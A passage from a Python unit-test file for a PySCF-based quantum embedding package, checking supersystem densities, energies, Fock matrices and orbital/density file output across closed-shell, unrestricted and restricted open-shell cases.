subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, env_method)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj)
supersystem.init_density()
scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
scf_obj.kernel()
init_dmat = scf_obj.make_rdm1()
self.assertTrue(np.allclose(init_dmat, supersystem.fs_dmat[0] + supersystem.fs_dmat[1]))
self.assertTrue(np.allclose(init_dmat, supersystem.get_emb_dmat()))
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, env_method, hl_method, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=2)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, unrestricted=True)
supersystem.init_density()
scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=2)
scf_obj.kernel()
init_dmat = scf_obj.make_rdm1()
self.assertTrue(np.allclose(init_dmat, supersystem.fs_dmat))
#Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, env_method)
mol12 = helpers.concat_mols([self.os_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj)
supersystem.init_density()
scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
scf_obj.kernel()
init_dmat = scf_obj.make_rdm1()
self.assertTrue(np.allclose(init_dmat, supersystem.fs_dmat))
def test_get_supersystem_energy(self):
#Closed Shell
hl_method = 'ccsd'
env_method = 'b3lyp'
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=3)
fs_scf_obj.verbose = 4
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
test_scf = dft.RKS(supersystem.mol.copy())
test_scf.xc = env_method
test_scf.verbose = 4
test_scf.max_cycle=3
test_e = test_scf.kernel(init_guess='minao')
test_dmat = test_scf.make_rdm1()
self.assertAlmostEqual(test_e, supsystem_e)
self.assertTrue(np.allclose(test_dmat, (supersystem.fs_dmat[0] + supersystem.fs_dmat[1])))
# Unrestricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, hl_unrestricted=True, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, unrestricted=True, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', unrestricted=True)
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
test_scf = dft.UKS(supersystem.mol.copy())
test_scf.xc = env_method
test_scf.max_cycle=3
test_e = test_scf.kernel()
test_dmat = test_scf.make_rdm1()
self.assertAlmostEqual(test_e, supsystem_e)
self.assertTrue(np.allclose(test_dmat[0], supersystem.fs_dmat[0]))
self.assertTrue(np.allclose(test_dmat[1], supersystem.fs_dmat[1]))
# Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
test_scf = dft.ROKS(supersystem.mol.copy())
test_scf.xc = env_method
test_scf.max_cycle=3
test_e = test_scf.kernel()
test_dmat = test_scf.make_rdm1()
self.assertAlmostEqual(test_e, supsystem_e)
self.assertTrue(np.allclose(test_dmat[0], supersystem.fs_dmat[0]))
self.assertTrue(np.allclose(test_dmat[1], supersystem.fs_dmat[1]))
@unittest.skip
def test_save_fs_density(self):
from pyscf.tools import cubegen
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
env_method = 'b3lyp'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.save_fs_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
sup_dmat = supersystem.fs_dmat[0] + supersystem.fs_dmat[1]
cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_fs.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.save_fs_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
sup_dmat = supersystem.fs_dmat[0]
cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_fs_alpha.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
sup_dmat = supersystem.fs_dmat[1]
cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_fs_beta.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.save_fs_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
sup_dmat = supersystem.fs_dmat[0]
cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_fs_alpha.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
sup_dmat = supersystem.fs_dmat[1]
cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
with open(t_file.name + '_' + chkfile_index + '_fs_beta.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
@unittest.skip
def test_save_fs_spin_density(self):
from pyscf.tools import cubegen
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
env_method = 'b3lyp'
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.save_fs_spin_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
sup_dmat = supersystem.fs_dmat
cubegen.density(supersystem.mol, true_ftmp.name, np.subtract(sup_dmat[0], sup_dmat[1]))
with open(t_file.name + '_' + chkfile_index + '_fs_spinden.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
#Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
supersystem.save_fs_spin_density_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
sup_dmat = supersystem.fs_dmat
cubegen.density(supersystem.mol, true_ftmp.name, np.subtract(sup_dmat[0], sup_dmat[1]))
with open(t_file.name + '_' + chkfile_index + '_fs_spinden.cube', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data[99:], true_den_data[99:])
@unittest.skip
def test_save_fs_orbs(self):
from pyscf.tools import molden
t_file = tempfile.NamedTemporaryFile()
hl_method = 'ccsd'
env_method = 'b3lyp'
#Closed Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
sup_mo_coeff = supersystem.fs_scf.mo_coeff
sup_mo_energy = supersystem.fs_scf.mo_energy
sup_mo_occ = supersystem.fs_scf.mo_occ
test_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
supersystem.save_fs_orbital_file()
true_ftmp = tempfile.NamedTemporaryFile()
molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff, ene=sup_mo_energy, occ=sup_mo_occ)
with open(t_file.name + '_' + chkfile_index + '_fs.molden', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data, true_den_data)
#Unrestricted
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
supersystem.init_density()
supersystem.get_supersystem_energy()
sup_mo_coeff = supersystem.fs_scf.mo_coeff
sup_mo_energy = supersystem.fs_scf.mo_energy
sup_mo_occ = supersystem.fs_scf.mo_occ
supersystem.save_fs_orbital_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff[0], ene=sup_mo_energy[0], occ=sup_mo_occ[0], spin="Alpha")
with open(t_file.name + '_' + chkfile_index + '_fs_alpha.molden', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data, true_den_data)
molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff[1], ene=sup_mo_energy[1], occ=sup_mo_occ[1], spin="Beta")
with open(t_file.name + '_' + chkfile_index + '_fs_beta.molden', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data, true_den_data)
#Restricted Open Shell
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
supersystem.init_density()
supersystem.get_supersystem_energy()
sup_mo_coeff = supersystem.fs_scf.mo_coeff
sup_mo_energy = supersystem.fs_scf.mo_energy
sup_mo_occ = supersystem.fs_scf.mo_occ
supersystem.save_fs_orbital_file()
true_ftmp = tempfile.NamedTemporaryFile()
chkfile_index = supersystem.chkfile_index
molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff, ene=sup_mo_energy, occ=sup_mo_occ)
with open(t_file.name + '_' + chkfile_index + '_fs.molden', 'r') as fin:
test_den_data = fin.read()
with open(true_ftmp.name, 'r') as fin:
true_den_data = fin.read()
self.assertEqual(test_den_data, true_den_data)
def test_get_emb_subsys_elec_energy(self):
# Closed Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supersystem.update_fock()
mf = dft.RKS(supersystem.mol)
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[np.ix_(s2s[0], s2s[0])] += subsys.get_dmat()
mf_init_dmat[np.ix_(s2s[1], s2s[1])] += subsys2.get_dmat()
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
dm_1 = mf_init_dmat[np.ix_(s2s[0], s2s[0])]
hcore_1_emb = mf_hcore[np.ix_(s2s[0], s2s[0])]
veff_1_emb = mf_init_veff[np.ix_(s2s[0], s2s[0])]
mf_1 = dft.RKS(self.cs_mol1)
mf_1.xc = self.env_method
mf_1.grids = supersystem.fs_scf_obj.grids
hcore_1_emb = hcore_1_emb - mf_1.get_hcore()
veff_1 = mf_1.get_veff(dm=dm_1)
veff_1_emb = veff_1_emb - veff_1
test_sub1_e = mf_1.energy_elec(dm=dm_1)[0] + np.einsum('ij,ji', hcore_1_emb, dm_1) + np.einsum('ij,ji', veff_1_emb, dm_1)
dm_2 = mf_init_dmat[np.ix_(s2s[1], s2s[1])]
hcore_2_emb = mf_hcore[np.ix_(s2s[1], s2s[1])]
veff_2_emb = mf_init_veff[np.ix_(s2s[1], s2s[1])]
mf_2 = dft.RKS(self.cs_mol2)
mf_2.xc = self.env_method
mf_2.grids = supersystem.fs_scf_obj.grids
hcore_2_emb = hcore_2_emb - mf_2.get_hcore()
veff_2 = mf_2.get_veff(dm=dm_2)
veff_2_emb = veff_2_emb - veff_2
test_sub2_e = mf_2.energy_elec(dm=dm_2)[0] + np.einsum('ij,ji', hcore_2_emb, dm_2) + np.einsum('ij,ji', veff_2_emb, dm_2)
sub1_e = supersystem.subsystems[0].get_env_elec_energy()
sub2_e = supersystem.subsystems[1].get_env_elec_energy()
self.assertAlmostEqual(test_sub1_e, sub1_e, delta=1e-8)
self.assertAlmostEqual(test_sub2_e, sub2_e, delta=1e-8)
# Unrestricted Open Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, unrestricted=True, hl_unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
mf = dft.UKS(supersystem.mol)
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
dm_1 = [mf_init_dmat[0][np.ix_(s2s[0], s2s[0])], mf_init_dmat[1][np.ix_(s2s[0], s2s[0])]]
hcore_1_emb = mf_hcore[np.ix_(s2s[0], s2s[0])]
veff_1_emb = [mf_init_veff[0][np.ix_(s2s[0], s2s[0])], mf_init_veff[0][np.ix_(s2s[0], s2s[0])]]
mf_1 = dft.UKS(self.os_mol1)
mf_1.xc = self.env_method
mf_1.grids = supersystem.fs_scf_obj.grids
hcore_1_emb = hcore_1_emb - mf_1.get_hcore()
veff_1 = mf_1.get_veff(dm=dm_1)
veff_1_emb = [veff_1_emb[0] - veff_1[0], veff_1_emb[1] - veff_1[1]]
test_sub1_e = mf_1.energy_elec(dm=dm_1)[0] + np.einsum('ij,ji', hcore_1_emb, dm_1[0]) + np.einsum('ij,ji', hcore_1_emb, dm_1[1]) + np.einsum('ij,ji', veff_1_emb[0], dm_1[0]) + np.einsum('ij,ji', veff_1_emb[1], dm_1[1])
dm_2 = [mf_init_dmat[0][np.ix_(s2s[1], s2s[1])], mf_init_dmat[1][np.ix_(s2s[1], s2s[1])]]
hcore_2_emb = mf_hcore[np.ix_(s2s[1], s2s[1])]
veff_2_emb = [mf_init_veff[1][np.ix_(s2s[1], s2s[1])], mf_init_veff[1][np.ix_(s2s[1], s2s[1])]]
mf_2 = dft.UKS(self.os_mol2)
mf_2.xc = self.env_method
mf_2.grids = supersystem.fs_scf_obj.grids
hcore_2_emb = hcore_2_emb - mf_2.get_hcore()
veff_2 = mf_2.get_veff(dm=dm_2)
veff_2_emb = [veff_2_emb[0] - veff_2[0], veff_2_emb[1] - veff_2[1]]
test_sub2_e = mf_2.energy_elec(dm=dm_2)[0] + np.einsum('ij,ji', hcore_2_emb, dm_2[0]) + np.einsum('ij,ji', hcore_2_emb, dm_2[1]) + np.einsum('ij,ji', veff_2_emb[0], dm_2[0]) + np.einsum('ij,ji', veff_2_emb[1], dm_2[1])
sub1_e = supersystem.subsystems[0].get_env_elec_energy()
sub2_e = supersystem.subsystems[1].get_env_elec_energy()
self.assertAlmostEqual(test_sub1_e, sub1_e, delta=1e-8)
self.assertAlmostEqual(test_sub2_e, sub2_e, delta=1e-8)
# Restricted Open Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
mf = dft.ROKS(supersystem.mol)
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
dm_1 = [mf_init_dmat[0][np.ix_(s2s[0], s2s[0])], mf_init_dmat[1][np.ix_(s2s[0], s2s[0])]]
hcore_1_emb = mf_hcore[np.ix_(s2s[0], s2s[0])]
veff_1_emb = [mf_init_veff[0][np.ix_(s2s[0], s2s[0])], mf_init_veff[1][np.ix_(s2s[0], s2s[0])]]
mf_1 = dft.ROKS(self.os_mol1)
mf_1.xc = self.env_method
mf_1.grids = supersystem.fs_scf_obj.grids
hcore_1_emb = hcore_1_emb - mf_1.get_hcore()
veff_1 = mf_1.get_veff(dm=dm_1)
veff_1_emb = [veff_1_emb[0] - veff_1[0], veff_1_emb[1] - veff_1[1]]
test_sub1_e = mf_1.energy_elec(dm=dm_1)[0] + np.einsum('ij,ji', hcore_1_emb, dm_1[0]) + np.einsum('ij,ji', hcore_1_emb, dm_1[1]) + np.einsum('ij,ji', veff_1_emb[0], dm_1[0]) + np.einsum('ij,ji', veff_1_emb[1], dm_1[1])
dm_2 = [mf_init_dmat[0][np.ix_(s2s[1], s2s[1])], mf_init_dmat[1][np.ix_(s2s[1], s2s[1])]]
hcore_2_emb = mf_hcore[np.ix_(s2s[1], s2s[1])]
veff_2_emb = [mf_init_veff[0][np.ix_(s2s[1], s2s[1])], mf_init_veff[1][np.ix_(s2s[1], s2s[1])]]
mf_2 = dft.ROKS(self.cs_mol3)
mf_2.xc = self.env_method
mf_2.grids = supersystem.fs_scf_obj.grids
hcore_2_emb = hcore_2_emb - mf_2.get_hcore()
veff_2 = mf_2.get_veff(dm=dm_2)
veff_2_emb = [veff_2_emb[0] - veff_2[0], veff_2_emb[1] - veff_2[1]]
test_sub2_e = mf_2.energy_elec(dm=dm_2)[0] + np.einsum('ij,ji', hcore_2_emb, dm_2[0]) + np.einsum('ij,ji', hcore_2_emb, dm_2[1]) + np.einsum('ij,ji', veff_2_emb[0], dm_2[0]) + np.einsum('ij,ji', veff_2_emb[1], dm_2[1])
sub1_e = supersystem.subsystems[0].get_env_elec_energy()
supersystem.subsystems[1].update_subsys_fock()
sub2_e = supersystem.subsystems[1].get_env_elec_energy() #this part of the test doesn't work because negative spin.
self.assertAlmostEqual(test_sub1_e, sub1_e, delta=1e-8)
self.assertAlmostEqual(test_sub2_e, sub2_e, delta=1e-8)
@unittest.skip
def test_get_env_in_env_energy(self):
pass
def test_update_fock(self):
# Closed Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
mf = scf.RKS(supersystem.mol)
mf.xc = self.env_method
grids = dft.gen_grid.Grids(supersystem.mol)
grids.build()
mf.grids = grids
mf_init_dmat = np.zeros_like(supersystem.get_emb_dmat())
s2s = supersystem.sub2sup
mf_init_dmat[np.ix_(s2s[0], s2s[0])] += subsys.get_dmat()
mf_init_dmat[np.ix_(s2s[1], s2s[1])] += subsys2.get_dmat()
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
full_fock = mf_hcore + mf_init_veff
self.assertTrue(np.allclose(full_fock, supersystem.fock[0]))
test_fock1 = full_fock[np.ix_(s2s[0], s2s[0])]
test_fock2 = full_fock[np.ix_(s2s[1], s2s[1])]
self.assertTrue(np.allclose(test_fock1, supersystem.subsystems[0].emb_fock[0]))
self.assertTrue(np.allclose(test_fock2, supersystem.subsystems[1].emb_fock[0]))
# Unrestricted Open Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao', unrestricted=True)
supersystem.init_density()
supersystem.update_fock()
mf = dft.UKS(supersystem.mol.copy())
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
full_fock = [mf_hcore + mf_init_veff[0], mf_hcore + mf_init_veff[1]]
self.assertTrue(np.allclose(full_fock[0], supersystem.fock[0]))
self.assertTrue(np.allclose(full_fock[1], supersystem.fock[1]))
test_fock1 = [full_fock[0][np.ix_(s2s[0], s2s[0])], full_fock[1][np.ix_(s2s[0], s2s[0])]]
test_fock2 = [full_fock[0][np.ix_(s2s[1], s2s[1])], full_fock[1][np.ix_(s2s[1], s2s[1])]]
self.assertTrue(np.allclose(test_fock1[0], supersystem.subsystems[0].emb_fock[0]))
self.assertTrue(np.allclose(test_fock1[1], supersystem.subsystems[0].emb_fock[1]))
self.assertTrue(np.allclose(test_fock2[0], supersystem.subsystems[1].emb_fock[0]))
self.assertTrue(np.allclose(test_fock2[1], supersystem.subsystems[1].emb_fock[1]))
# Restricted Open Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
fs_scf_obj = helpers.gen_scf_obj(mol13, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supersystem.update_fock()
mf = dft.ROKS(supersystem.mol.copy())
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[0][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[0]
mf_init_dmat[0][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[0]
mf_init_dmat[1][np.ix_(s2s[0], s2s[0])] += subsys.env_dmat[1]
mf_init_dmat[1][np.ix_(s2s[1], s2s[1])] += subsys2.env_dmat[1]
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
full_fock = [mf_hcore + mf_init_veff[0], mf_hcore + mf_init_veff[1]]
self.assertTrue(np.allclose(full_fock[0], supersystem.fock[0]))
self.assertTrue(np.allclose(full_fock[1], supersystem.fock[1]))
test_fock1 = [full_fock[0][np.ix_(s2s[0], s2s[0])], full_fock[1][np.ix_(s2s[0], s2s[0])]]
